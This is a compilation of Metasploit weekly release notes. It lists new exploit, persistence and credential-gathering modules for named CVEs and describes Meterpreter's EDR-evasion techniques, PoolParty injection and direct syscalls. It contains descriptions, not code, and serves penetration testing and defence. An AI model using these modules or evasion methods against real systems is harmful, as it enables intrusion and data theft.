Post Syndicated from Alan David Foster original https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-11-21-2025

CVE-2025-64446 – Fortinet’s FortiWeb exploitation

A critical vulnerability in Fortinet’s FortiWeb Web Application Firewall, now assigned CVE-2025-64446 (CVSS 9.1), allows unauthenticated attackers to gain full administrator access to the FortiWeb Manager interface and its websocket CLI. The flaw became publicly known on October 6, 2025, after Defused shared a proof-of-concept exploit captured by their honeypots. Metasploit now has support for an auxiliary module admin/http/fortinet_fortiweb_create_admin which can be used to create a new administrative user, and an upcoming exploit module targeting Fortinet FortiWeb that exploits CVE-2025-64446 and CVE-2025-58034 for an authenticated command injection that allows for root OS command execution. For more details see Rapid7’s analysis on CVE-2025-64446

New module content (3)

Fortinet FortiWeb create new local admin

Authors: Defused and sfewer-r7

Type: Auxiliary Pull request: #20698 contributed by sfewer-r7

Path: admin/http/fortinet_fortiweb_create_admin

AttackerKB reference: CVE-2025-64446

Description: Adds a module for the recent FortiWeb 8.0.1 authentication bypass vulnerability allowing an attacker to create a new administrative user. The exploit is based on the PoC published by Defused.

Windows Persistent Service Installer

Authors: Green-m [email protected] and h00die

Type: Exploit Pull request: #20638 contributed by h00die

Path: windows/persistence/service

Description: Updates the Windows service persistence to use the new mixin, adds the ability to run as either Powershell or sc.exe, and uses more libraries.

Windows WSL via Registry Persistence

Authors: Joe Helle and h00die

Type: Exploit

Pull request: #20701 contributed by h00die

Path: windows/persistence/wsl/registry

Description: Adds a new Windows persistence module – the WSL registry module. The module will create registry entries (Run, RunOnce) to run a Linux payload stored in WSL.

Enhancements and features (5)

• #20560 from cdelafuente-r7 – Adds references to MITRE ATT&CK technique T1021 “Remote Services” and its sub-techniques.
• #20638 from h00die – Updates the windows service persistence to use the new mixin, adds the ability to run as either Powershell or sc.exe, and uses more libraries.
• #20689 from zeroSteiner – Add tests for socket channels in Meterpreter and SSH sessions.
• #20699 from sfewer-r7 – Adds the CVE number and further guidance on vulnerable versions for the vulnerability.
• #20707 from bcoles – Updates multiple Linux reboot payloads to note that CAP_SYS_BOOT privileges are required.

Bugs fixed (2)

• #20687 from dwelch-r7 – This updates the auxiliary/scanner/winrm/winrm_login module to catch access denied errors when trying to create a shell session. This is then used to inform the operator that the target account’s password is correct but they do not have permissions to start a shell with WinRM.
• #20695 from zeroSteiner – Updates the Java and PHP Meterpreter to send the local address and local port information back to Metasploit when opening TCP or UDP sockets on the remote host.
• #20708 from cdelafuente-r7 – Fixes a bug with msfdb when attempting to execute the program with bundle exec.
• #20711 from bcoles – Fixes description for AppendExit datastore option.

Documentation added (1)

• #20694 from cgranleese-r7 – Adds new documentation on Metasploit’s post module support. Additionally adds documentation for the new create_process API that supersedes the legacy cmd_exec API.

You can always find more documentation on our docsite at docs.metasploit.com.

Missing rn-* label on Github (4)

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

• Pull Requests 6.4.98…6.4.99
• Full diff 6.4.98…6.4.99

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the commercial edition Metasploit Pro

Post Syndicated from Alan David Foster original https://blog.rapid7.com/2025/06/06/metasploit-wrapup-76/

ThinManager Path Traversal (CVE-2023-27855) Arbitrary File Upload

Authors: Michael Heinzl and Tenable
Type: Auxiliary
Pull request: #20138 contributed by h4x-x0r
Path: admin/networking/thinmanager_traversal_upload
AttackerKB reference: CVE-2023-2917

Description: Adds an auxiliary module that targets CVE-2023-27855, a path traversal vulnerability in ThinManager <= v13.0.1 to upload an arbitrary file to the target system as SYSTEM.

ThinManager Path Traversal (CVE-2023-2917) Arbitrary File Upload

Authors: Michael Heinzl and Tenable
Type: Auxiliary
Pull request: #20141 contributed by h4x-x0r
Path: admin/networking/thinmanager_traversal_upload2
AttackerKB reference: CVE-2023-2917

Description: Adds a module targeting CVE-2023-2917, a path traversal vulnerability in ThinManager <= v13.1.0, to upload an arbitrary file as system.

ThinManager Path Traversal (CVE-2023-27856) Arbitrary File Download

Authors: Michael Heinzl and Tenable
Type: Auxiliary
Pull request: #20139 contributed by h4x-x0r
Path: gather/thinmanager_traversal_download
AttackerKB reference: CVE-2023-27856

Description: Adds an auxiliary module targeting CVE-2023-27856, a path traversal vulnerability in ThinManager <= v13.0.1, to download an arbitrary file from the target system.

udev persistence

Author: Julien Voisin
Type: Exploit
Pull request: #19472 contributed by jvoisin
Path: linux/local/udev_persistence

Description: This adds a module for udev persistence for Linux targets. The module requires root access because it creates udev rules. It will create a rule under the directory /lib/udev/rules./ and a malicious binary containing the payload. Successful exploitation requires the presence of the at binary on the system.

Ivanti EPMM Authentication Bypass for Expression Language Remote Code Execution

Authors: CERT-EU, Piotr Bazydlo, Sonny Macdonald, and remmons-r7
Type: Exploit
Pull request: #20265 contributed by remmons-r7
Path: multi/http/ivanti_epmm_rce_cve_2025_4427_4428
AttackerKB reference: CVE-2025-4428

Description: Adds a module chaining CVE-2025-4427 and CVE-2025-4428 an authentication flaw allowing unauthenticated access to an administrator web API endpoint allowing for code execution via expression language injection on many versions of MobileIron Core (rebranded as Ivanti EPMM).

PHP Exec, PHP Command Shell, Bind TCP (via Perl)

Authors: Samy [email protected], Spencer McIntyre, cazz [email protected], and msutovsky-r7
Type: Payload (Adapter)
Pull request: #19976 contributed by msutovsky-r7

Description: This enables creation of PHP payloads wrapped around bash / sh commands.

This adapter adds the following payloads:

• cmd/unix/php/bind_perl
• cmd/unix/php/bind_perl_ipv6
• cmd/unix/php/bind_php
• cmd/unix/php/bind_php_ipv6
• cmd/unix/php/download_exec
• cmd/unix/php/exec
• cmd/unix/php/meterpreter/bind_tcp
• cmd/unix/php/meterpreter/bind_tcp_ipv6
• cmd/unix/php/meterpreter/bind_tcp_ipv6_uuid
• cmd/unix/php/meterpreter/bind_tcp_uuid
• cmd/unix/php/meterpreter/reverse_tcp
• cmd/unix/php/meterpreter/reverse_tcp_uuid
• cmd/unix/php/meterpreter_reverse_tcp
• cmd/unix/php/reverse_perl
• cmd/unix/php/reverse_php
• cmd/unix/php/shell_findsock

Enhancements and features (3)

• #19900 from jvoisin – Updates multiple modules notes to now includes additional AKA (Also Known As) references for EquationGroup codenames.
• #20263 from cdelafuente-r7 – Updates Metasploit to register VulnAttempts for both Exploit and Auxiliary modules.
• #20277 from adfoster-r7 – Add support for Ruby 3.2.8.

Bugs fixed (7)

• #20218 from jheysel-r7 – Fixes an issue in the web crawler’s canonicalize method, which previously resulted in incorrect URIs being returned.
• #20246 from bcoles – Fixes an issue within msfvenom when using zutto_dekiru encoder on a raw payload.
• #20258 from zeroSteiner – Updates the datastore options in auxiliary/admin/ldap/shadow_credentials to reference the new LDAP datastore names.
• #20260 from zeroSteiner – Updates the auxiliary/admin/ldap/change_password module to use the new LDAP datastore options.
• #20273 from JohannesLks – This fixes multiple issues in the post/windows/manage/remove_host module that would occur when a line had multiple names on it or used tab characters instead of spaces.
• #20275 from msutovsky-r7 – This fixes a bug in the auxiliary/scanner/sap/sap_router_info_request module what would cause it to crash when a corrupted packet was received.
• #20281 from JohannesLks – This fixes an issue in the post/windows/manage/resolve_host module that would occur if the system wasn’t installed to C:\.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.4.66…6.4.68
• Full diff 6.4.66…6.4.68

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.To install fresh without using git, you can use the open-source-only Nightly Installers or the commercial edition Metasploit Pro

Post Syndicated from Alan David Foster original https://blog.rapid7.com/2024/12/20/metasploit-weekly-wrap-up-12-20-2024/

New module content (4)

GameOver(lay) Privilege Escalation and Container Escape

Authors: bwatters-r7, g1vi, gardnerapp, and h00die
Type: Exploit
Pull request: #19460 contributed by gardnerapp
Path: linux/local/gameoverlay_privesc
AttackerKB reference: CVE-2023-2640

Description: Adds a module for CVE-2023-2640 and CVE-2023-32629, a local privilege escalation in some Ubuntu kernel versions that abuses overly trusting OverlayFS features.

Clinic’s Patient Management System 1.0 – Unauthenticated RCE

Authors: Aaryan Golatkar and Oğulcan Hami Gül
Type: Exploit
Pull request: #19733 contributed by aaryan-11-x
Path: multi/http/clinic_pms_fileupload_rce
AttackerKB reference: CVE-2022-40471

Description: New exploit module for Clinic’s Patient Management System 1.0 that targets CVE-2022-40471. The module exploits unrestricted file upload, which can be further used to get remote code execution (RCE) through a malicious PHP file.

WordPress WP Time Capsule Arbitrary File Upload to RCE

Authors: Rein Daelman and Valentin Lobstein
Type: Exploit
Pull request: #19713 contributed by Chocapikk
Path: multi/http/wp_time_capsule_file_upload_rce
AttackerKB reference: CVE-2024-8856

Description: This exploits a remote code execution (RCE) vulnerability (CVE-2024-8856) in the WordPress WP Time Capsule plugin (versions ≤ 1.22.21). This vulnerability allows unauthenticated attackers to upload and execute arbitrary files due to improper validation within the plugin.

WSO2 API Manager Documentation File Upload Remote Code Execution

Authors: Heyder Andrade <@HeyderAndrade>, Redway Security <redwaysecurity.com>, and Siebene@ <@Siebene7>
Type: Exploit
Pull request: #19647 contributed by heyder
Path: multi/http/wso2_api_manager_file_upload_rce
AttackerKB reference: CVE-2023-2988

Description: Adds an exploit module for a vulnerability in the ‘Add API Documentation’ feature of WSO2 API Manager (CVE-2023-2988) that allows malicious users with specific permissions to upload arbitrary files to a user-controlled server location. This flaw allows for RCE on the target system.

Enhancements and features (4)

• #19546 from adfoster-r7 – Improves the database module cache performance from ~3 minutes to ~1 minute by performing bulk inserts of module metadata instead of multiple smaller inserts for every module/reference/author/etc.
• #19660 from zeroSteiner – Updates OptEnum to validate values without being case sensitive while preserving the case the author was expecting.
• #19715 from oddlittlebird – Improves db/README.md documentation.
• #19718 from sjanusz-r7 – Expose the currently authenticated rpc_token to RPC handlers.

Bugs fixed (4)

• #19719 from bwatters-r7 – Fixed a syntax error in the code generated by fetch payloads when the FETCH_DELETE option was enabled.
• #19721 from bwatters-r7 – This updates the way the module checks the Windows build version to determine if it’s vulnerable to CVE-2020-0668.
• #19726 from pczinser – The reverse HTTP and HTTPS Meterpreter x64 payloads now correctly set the User-Agent HTTP header when connecting back to Metasploit. Before this fix, the HttpUserAgent option was not used properly. You can now use this option to customize the User-Agent HTTP header when using these payloads.
• #19739 from sjanusz-r7 – Fixes an issue with the post/multi/recon/local_exploit_suggester module which would crash if a TARGET value was set.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

• Pull Requests 6.4.40…6.4.41
• Full diff 6.4.40…6.4.41

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the commercial edition Metasploit Pro.

Post Syndicated from Alan David Foster original https://blog.rapid7.com/2024/11/01/metasploit-weekly-wrap-up-11-01-2024/

Pool Party Windows Process Injection

This Metasploit-Framework release includes a new injection technique deployed on core Meterpreter functionalities such as process migration and DLL Injection.
The research of a new injection technique known as PoolParty highlighted new ways to gain code execution on a remote process by abusing Thread-Pool management features included on Windows kernel starting from Windows Vista. During our research effort to integrate the new injection technique inside the Meterpreter code-base we encountered some technical challenges we would like to share.. Currently Meterpreter makes use of the (in)famous system feature provided by Microsoft, the kernel32!CreateRemoteThread to achieve code injection. Although nowadays every EDR should be able to prevent an injection using this API call, this still is the most features rich way to inject code in a target process. Our goal during the porting of this technique was to find the variant more suitable for our needs:

• Able to pass a parameter pointer
• Able to be injected and later executed, like a Suspended Thread
• Be able to be injected from and to a WoW64 processes
• Leave less footprints as possible on the target process

From the Original Pool Party PoC we selected three candidates:

• TP_WAIT_INSERTION
• TP_DIRECT_INSERTION
• WORKER_THREAD_FACTORY_OVERWRITE

In order to achieve the same flexibility offered by the CreateRemoteThread an intermediate stub was developed in order to have correct parameter ordering, controlled execution over a duplicated handle and cleanup of the injection after successful execution making the migration chain looking like:

Target ProcessMeterpreterMetasploit-FrameworkTarget ProcessMeterpreterMetasploit-Framework

Request MigrationInject PoolParty StubInject PoolParty ContextInject Migration StubInject Migration ContextInject Stageless PayloadInject Payload ConfigStart PoolParty Stub (Suspended)Start Migration ProcessSleep 20 secondsResume PoolParty Stub Thread

Pool-Party Stub Details

Argument Passing

The argument passing depends on the variant used, some of them allows argument passing but some doesn’t, during our research we investigated and tested the following two variants for argument passing.

• TP_WAIT_INSERTION
• TP_DIRECT_INSERTION

Even if the TP_WAIT_INSERTION supports the argument pointer passing, the format of the WaitCallback expects the parameter to be on the second position instead of the first one, making necessary in an intermediate stub to avoid hot-patching the lpMigrationStub provided by framework.

To have an unified stub that could be used across all variants we decided to not use variant-specific argument passing and decided to retrieve our data from the end of the shellcode.

Delayed Execution

To achieve a suspended-like thread on the PoolParty we came up with the idea of creating and duplicating the HANDLE of an hEvent, in this way, when we perform the step 8. In our migration chain, the execution is delayed by the WaitForSingleObject inside the target process and later released by the Meterpreter using SetEvent against the duplicated handle.

Execution Cleanup

On the original PoC’s shellcode, the execution ends inside an infinite loop that prevents thread from returning successfully. In our investigation we observed different outcomes depending on the variant used to achieve the injection. We were able to successfully clean up the execution on the TP_DIRECT_INSERTION variant.

Injection Features and Limits

Currently the PoolParty injection works with all the 64-bit systems having a Windows Kernel >= 10.0, it supports injection from x64 -> x64 and WoW64 -> x64. Currently there is no support for systems between Windows Vista and Windows 8.1 and the WoW64 injections are partially implemented due to some security restrictions.
Feel free to share with us feedback, issues or requests for further coverage by opening an Issue on GitHub or by sending a message to our Slack Metasploit server.

New module content (3)

WordPress Ultimate Member SQL Injection (CVE-2024-1071)

Authors: Christiaan Swiers and Valentin Lobstein
Type: Auxiliary
Pull request: #19488 contributed by Chocapikk
Path: scanner/http/wp_ultimate_member_sorting_sqli
AttackerKB reference: CVE-2024-1071

Description: This adds a new auxiliary module to exploit an unauthenticated SQL injection vulnerability in the Ultimate Member plugin for WordPress versions 2.1.3 to 2.8.2. The vulnerability allows an unauthenticated attacker to extract sensitive data via the sorting parameter.

WordPress wp-automatic Plugin SQLi Admin Creation

Authors: Rafie Muhammad and Valentin Lobstein
Type: Exploit
Pull request: #19489 contributed by Chocapikk
Path: multi/http/wp_automatic_sqli_to_rce
AttackerKB reference: CVE-2024-27956

Description: This adds a new exploit module for the SQL injection vulnerability in the WordPress wp-automatic plugin, affecting versions prior to 3.92.1. The vulnerability allows unauthenticated attackers to inject SQL commands, enabling them to create a malicious administrator account. Using the newly created admin account, the attacker can upload a plugin and achieve remote code execution.

Advanced Browser Data Extraction for Chromium and Gecko Browsers

Author: Alexander "xaitax" Hagenah
Type: Post
Pull request: #19506 contributed by xaitax
Path: windows/gather/enum_browsers

Description: Adds a new post-exploitation post/windows/gather/enum_browsers module which extracts sensitive browser data from both Chromium-based and Gecko-based browsers on the target system. It supports the decryption of passwords and cookies using Windows Data Protection API (DPAPI) and can extract additional data such as browsing history, keyword search history, download history, autofill data, credit card information, browser cache and installed extensions.

Enhanced Modules (1)

Modules which have either been enhanced, or renamed:

• #19527 from Chocapikk – Updates the exploit/multi/http/wp_givewp_rce module with a patch bypass. This module is now compatible with GiveWP version 3.16.1.

Enhancements and features (2)

• #19597 from zeroSteiner – Fix symlink and junction detection on Python windows Meterpreter.
• #19600 from adfoster-r7 – Updates the post windows modules gather/credentials/seamonkey, gather/credentials/chrome, and gather/enum_chrome as being superseded by windows/gather/enum_browsers.

Bugs fixed (3)

• #19551 from smashery – This fixes an issue when the LDAP session feature is enabled that caused the USERNAME and PASSWORD datastore options to be required, despite not being necessary when the configuration is set to kerberos or schannel.
• #19553 from smashery – This fixes a bug in modules that use Kerberos authentication where when the KrbOfferedEncryptionTypes datastore option was set, it would be ignored instead of used to select a compatible ticket from the cache.
• #19607 from adfoster-r7 – Fixes a bug that caused tables to render incorrectly when running under docker.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.4.33…6.4.34
• Full diff 6.4.33…6.4.34

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the commercial edition Metasploit Pro

Post Syndicated from Alan David Foster original https://blog.rapid7.com/2024/08/23/metasploit-weekly-wrap-up-08-23-2024/

New module content (3)

Fortra FileCatalyst Workflow SQL Injection (CVE-2024-5276)

Authors: Michael Heinzl and Tenable
Type: Auxiliary
Pull request: #19373 contributed by h4x-x0r
Path: admin/http/fortra_filecatalyst_workflow_sqli
AttackerKB reference: CVE-2024-5276

Description: This adds an auxiliary module to exploit the CVE-2024-5276, a SQL injection vulnerability that allows for adding an arbitrary administration user in the application.

SPIP Unauthenticated RCE via porte_plume Plugin

Authors: Julien Voisin, Laluka, and Valentin Lobstein
Type: Exploit
Pull request: #19394 contributed by Chocapikk
Path: multi/http/spip_porte_plume_previsu_rce

Description: Adds a new exploit/multi/http/spip_porte_plume_previsu_rce SPIP unauthenticated remote code execution (RCE) module targeting SPIP versions up to and including 4.2.12.

DIAEnergie SQL Injection (CVE-2024-4548)

Authors: Michael Heinzl and Tenable
Type: Exploit
Pull request: #19351 contributed by h4x-x0r
Path: windows/scada/diaenergie_sqli
AttackerKB reference: CVE-2024-4548

Description: This adds an exploit module for CVE-2024-4548, an unauthenticated SQL injection vulnerability that allows remote code execution as NT AUTHORITY\SYSTEM.

Bugs fixed (1)

• #19366 from adeherdt-r7 – Updates the Jenkins login scanner to correctly determine whether authentication is required.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

• Pull Requests 6.4.22…6.4.23
• Full diff 6.4.22…6.4.23

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Post Syndicated from Alan David Foster original https://blog.rapid7.com/2024/06/14/metasploit-weekly-wrap-up-06-14-2024/

New module content (5)

Telerik Report Server Auth Bypass

Authors: SinSinology and Spencer McIntyre
Type: Auxiliary
Pull request: #19242 contributed by zeroSteiner
Path: scanner/http/telerik_report_server_auth_bypass
AttackerKB reference: CVE-2024-4358

Description: This adds an exploit for CVE-2024-4358 which is an authentication bypass in Telerik Report Server versions up to and including 10.0.24.305.

Cacti Import Packages RCE

Authors: Christophe De La Fuente and Egidio Romano
Type: Exploit
Pull request: #19196 contributed by cdelafuente-r7
Path: multi/http/cacti_package_import_rce
AttackerKB reference: CVE-2024-25641

Description: This exploit module leverages an arbitrary file write vulnerability (CVE-2024-25641) in Cacti versions prior to 1.2.27 to achieve RCE. It abuses the Import Packages feature to upload a specially crafted package that embeds a PHP file.

VSCode ipynb Remote Development RCE

Authors: Zemnmez and h00die
Type: Exploit
Pull request: #18998 contributed by h00die
Path: multi/misc/vscode_ipynb_remote_dev_exec
AttackerKB reference: CVE-2022-41034

Description: VSCode allows users to open a Jypiter notebook (.ipynb) file. Versions v1.4.0 – v1.71.1 allow the Jypiter notebook to embed HTML and javascript, which can then open new terminal windows within VSCode. Each of these new windows can then execute arbitrary code at startup. This vulnerability is tracked as CVE-2022-41034.

Rejetto HTTP File Server (HFS) Unauthenticated Remote Code Execution

Authors: Arseniy Sharoglazov and sfewer-r7
Type: Exploit
Pull request: #19240 contributed by sfewer-r7
Path: windows/http/rejetto_hfs_rce_cve_2024_23692
AttackerKB reference: CVE-2024-23692

Description: Adds an exploit module for CVE-2024-23692, an unauthorized SSTI in the Rejetto HTTP File Server (HFS).

Telerik Report Server Auth Bypass and Deserialization RCE

Authors: SinSinology, Soroush Dalili, Spencer McIntyre, and Unknown
Type: Exploit
Pull request: #19243 contributed by zeroSteiner
Path: windows/http/telerik_report_server_deserialization
AttackerKB reference: CVE-2024-4358

Description: This adds an exploit for CVE-2024-1800 which is an authenticated RCE in Telerik Report Server. To function without authentication it chains CVE-2024-4358 to create a new administrator account before launching the authenticated RCE.

Enhancements and features (4)

• #19191 from adfoster-r7 – Adds support for Ruby 3.4.0-preview1.
• #19197 from sjanusz-r7 – Updates the new PostgreSQL, MSSQL, and MySQL session types to track the history of commands that the user has entered.
• #19199 from cgranleese-r7 – Updates brute force modules to output a summary of the credential discovered. This functionality is currently opt-in with the feature set show_successful_logins true msfconsole command.
• #19225 from h00die – This adds a link to android payload issues to increase visibility.

Bugs fixed (3)

• #19235 from cgranleese-r7 – Fixes an issue where Java payloads zip paths were not being created properly.
• #19239 from e2002e – Updates the modules/auxiliary/gather/zoomeye_search module to work again.
• #19248 from zgoldman-r7 – This removes an extra rescue clause added in error and allows the actual rescue clause to rescue exceptions properly in the event a staged http[s] payload calls back to a stageless http[s] listener.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.4.12…6.4.13
• Full diff 6.4.12…6.4.13

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the commercial edition Metasploit Pro

Post Syndicated from Alan David Foster original https://blog.rapid7.com/2024/04/05/metasploit-weekly-wrap-up-04-05-2024/

New ESC4 Templates for AD CS

Metasploit added capabilities for exploiting the ESC family of flaws in AD CS in Metasploit 6.3. The ESC4 technique in particular has been supported for some time now thanks to the ad_cs_cert_templates module which enables users to read and write certificate template objects. This facilitates the exploitation of ESC4 which is a misconfiguration in the access controls of the LDAP object, allowing an attacker to tamper with them. This is typically used by an attacker to modify a certificate template object they are capable of modifying to make it susceptible to ESC1. Metasploit offers a premade template for ESC1 that a user could select to perform this attack.

This attack workflow was expanded on this week with two new templates for ESC2 and ESC3. These new templates allow Metasploit users that are concerned about ESC1 being detected with alternative options for exploitation. Additionally, the premade templates can be edited, to for example restrict permissions to a particular SID by changing the SDDL text of the ntSecurityDescriptor.

New module content (2)

WatchGuard XTM Firebox Unauthenticated Remote Command Execution

Authors: Charles Fol (Ambionics Security), Dylan Pindur (AssetNote), Misterxid, and h00die-gr3y [email protected]
Type: Exploit
Pull request: #18915 contributed by h00die-gr3y
Path: linux/http/watchguard_firebox_unauth_rce_cve_2022_26318
AttackerKB reference: CVE-2022-26318

Description: This PR adds a module for a buffer overflow at the administration interface of WatchGuard Firebox and XTM appliances. The appliances are built from a cherrypy python backend sending XML-RPC requests to a C binary called wgagent using pre-authentication endpoint /agent/login. This vulnerability impacts Fireware OS before 12.7.2_U2, 12.x before 12.1.3_U8, and 12.2.x through 12.5.x before 12.5.9_U2. Successful exploitation results in remote code execution as user nobody.

Jenkins CLI Ampersand Replacement Arbitrary File Read

Authors: Vozec, Yaniv Nizry, binganao, h00die, and h4x0r-dz
Type: Auxiliary
Pull request: #18764 contributed by h00die
Path: gather/jenkins_cli_ampersand_arbitrary_file_read
AttackerKB reference: CVE-2024-23897

Description: This PR adds a new module to exploit CVE-2024-23897, an unauthorized arbitrary (first 2 lines) file read on Jenkins versions prior to 2.442 or for the LTS stream, versions prior to 2.426.3.

Enhancements and features (4)

• #18906 from zeroSteiner – This PR adds support for leveraging the ESC4 attack on misconfigured AD-CS servers to introduce ESC2 and ESC3.
• #18933 from sjanusz-r7 – Updates the new SQL session types to correctly remember previous commands that the user has entered.
• #19003 from ArchiMoebius – Updates msfvenom and payload generation to support formatting payloads as a Zig buffer.
• #19014 from cgranleese-r7 – Adds an initial set of acceptance tests for MySQL modules and session types.

Bugs fixed (3)

• #18935 from zeroSteiner – This PR fixes a common user mistake when authenticating with LDAP modules. Now, users can specify either the USERNAME (user) and DOMAIN (domain.local) datastore options or the original format of just the USERNAME in the UPN format ([email protected]). This fix updates the LDAP library.
• #19007 from dwelch-r7 – Fixes a regression that affected exploit/multi/http/log4shell_header_injection module which stopped the module from running successfully.
• #19021 from cgranleese-r7 – Updates the admin/mysql/mysql_enum module to work with newer versions of MySQL.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.4.1…6.4.2
• Full diff 6.4.1…6.4.2

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Post Syndicated from Alan David Foster original https://blog.rapid7.com/2024/01/26/metasploit-weekly-wrap-up-01-26-24/

Direct Syscalls Support for Windows Meterpreter

Direct system calls are a well-known technique that is often used to bypass EDR/AV detection. This technique is particularly useful when dynamic analysis is performed, where the security software monitors every process on the system to detect any suspicious activity. One common way to do so is to add user-land hooks on Win32 API calls, especially those commonly used by malware. Direct syscalls are a way to run system calls directly and enter kernel mode without passing through the Win32 API.

This first implementation focuses on substituting the Win32 API calls used by the Reflective DLL Injection (RDI) library with Direct Syscalls to the corresponding Native API’s. For example, VirtualAlloc has been substituted by a system call to ZwAllocateVirtualMemory. Since RDI is used everywhere by Meterpreter and its extensions, it was a very good candidate for this initial work.

The main difficulty is to find the correct syscall number since it is not the same across Windows versions. Also, EDR’s usually hook the NTDLL native API, making the discovery of syscall numbers more challenging. The technique used for this is based on the assumption that the syscall numbers are assigned in a sequential order, starting from the number 0. If we look at how native API functions are stored in memory, the syscall number can be deduced from the position of the related native API function in memory. The technique consists in selecting the system call functions (Zw…) from ntdll.dll exports and sorting them in ascending order of their memory addresses. The syscall number of one given native API function is simply its index in this sorted list. This is very similar to the technique used by Halo’s Gate.

Another improvement is to make sure the call to the syscall instruction is made through ntdll.dll. EDR/AV can monitor this and flag any system calls not coming from ntdll.dll as suspicious. This technique is directly taken from RecycledGate. Here, the complexity is that Meterpreter must be compatible with all Windows versions from WinXP to the most recent flavors. This implementation will take care of parsing ntdll.dll and get the correct trampoline address that will be used when the system call is executed.

This work is a first step and we expect more additions this year. The next step is to switch additional Win32 API requests that Meterpreter and its extensions make to their corresponding native API using Direct Syscalls. The long-term goal is to make Direct Syscalls a standard for any future Windows-based development (payload, exploit, etc.).

New module content (8)

GL.iNet Unauthenticated Remote Command Execution via the logread module.

Authors: DZONERZY, Unknown, and h00die-gr3y [email protected]
Type: Exploit
Pull request: #18648 contributed by h00die-gr3y
Path: linux/http/glinet_unauth_rce_cve_2023_50445

Description: This PR adds an exploit module for a number of different GL.iNet network products. The module combines an authentication by-pass vulnerability (CVE-2023-50919) with an RCE (CVE-2023-50445) allowing the user to remotely obtain, without authentication, a Meterpreter session running in the context of the root user.

Ivanti Connect Secure Unauthenticated Remote Code Execution

Author: sfewer-r7
Type: Exploit
Pull request: #18708 contributed by sfewer-r7
Path: linux/http/ivanti_connect_secure_rce_cve_2023_46805

Description: This PR adds an exploit chain that consists of two vulnerabilities, an authentication bypass (CVE-2023-46805) and a command injection vulnerability (CVE-2024-21887). The exploit chain allows a remote unauthenticated attacker to execute arbitrary OS commands with root privileges. As per the Ivanti advisory, these vulnerabilities affect all supported versions of the products, versions 9.x and 22.x. It is unknown if the unsupported versions 8.x and older are also affected.

MajorDoMo Command Injection

Authors: Valentin Lobstein and smcintyre-r7
Type: Exploit
Pull request: #18630 contributed by Chocapikk
Path: linux/http/majordomo_cmd_inject_cve_2023_50917

Description: This adds an exploit for a command injection vulnerability in MajorDoMo versions before 0662e5e.

Saltstack Minion Payload Deployer

Authors: c2Vlcgo and h00die
Type: Exploit
Pull request: #18626 contributed by h00die
Path: linux/local/saltstack_salt_minion_deployer

Description: This PR adds an exploit module which allows for a user who has compromised a host acting as a SaltStack Master to deploy payloads to the Minions attached to that Master.

Apache Commons Text RCE

Authors: Alvaro Muñoz, Gaurav Jain, and Karthik UJ
Type: Exploit
Pull request: #18638 contributed by errorxyz
Path: multi/http/apache_commons_text4shell

Description: Adds an exploit module for CVE-2022-42889 that targets web apps utilizing Apache Commons Text’s (1.5-1.9) StringSubstitutor interpolator class in an insecure fashion.

Atlassian Confluence SSTI Injection

Authors: Harsh Jaiswal, Rahul Maini, and Spencer McIntyre
Type: Exploit
Pull request: #18734 contributed by zeroSteiner
Path: multi/http/atlassian_confluence_rce_cve_2023_22527

Description: This adds an exploit for CVE-2023-22527 which is an unauthenticated RCE in Atlassian Confluence. The vulnerability is due to an SSTI flaw that allows an OGNL expression to be evaluated. The result is OS command execution in the context of the service account.

PRTG CVE-2023-32781 Authenticated RCE

Author: Kevin Joensen [email protected]
Type: Exploit
Pull request: #18568 contributed by ggisz
Path: windows/http/prtg_authenticated_rce_cve_2023_32781

Description: This PR adds a module leveraging CVE-2023-32781, an authenticated command injection vulnerability in PRTG versions 23.2.84.1566 and earlier. The result is command execution as SYSTEM.

Memory Search

Author: sjanusz-r7
Type: Post
Pull request: #18713 contributed by sjanusz-r7
Path: multi/gather/memory_search

Description: Adds a new multi/gather/memory_search module that can read memory of processes on Windows and Linux hosts with Meterpreter. Regular expressions can be used to find passwords/credentials, and glob patterns and PIDs can be used to identify target processes.

Enhancements and features (6)

• #17634 from adfoster-r7 – Reliability and stability notes that have been previously missing have been added to some modules.
• #18645 from jvoisin – This adds a way to get the Build ID from ld.so by using the ‘perf’ command. Before this module depended on the commands ‘file’ and ‘readelf’ being installed to get the Build ID.
• #18663 from sjanusz-r7 – Adds a new Postgres session type, which is current behind a feature flag that can be activated with: features set postgresql_session_type true. Example usage: use scanner/postgres/postgres_login followed by run postgres://postgres:[email protected]:9000/template1 createsession=true verbose=false.
• #18720 from zeroSteiner – This enhancement marks the existing Unix encoders as also being compatible with Linux. Previously, no encoder modules were marked as compatible with Linux, so users could not set bad character when using the new fetch payloads.
• #18735 from AleksaZatezalo – Adds additional module metadata to the exploits/windows/iis/iis_webdav_scstoragepathfromurl module.
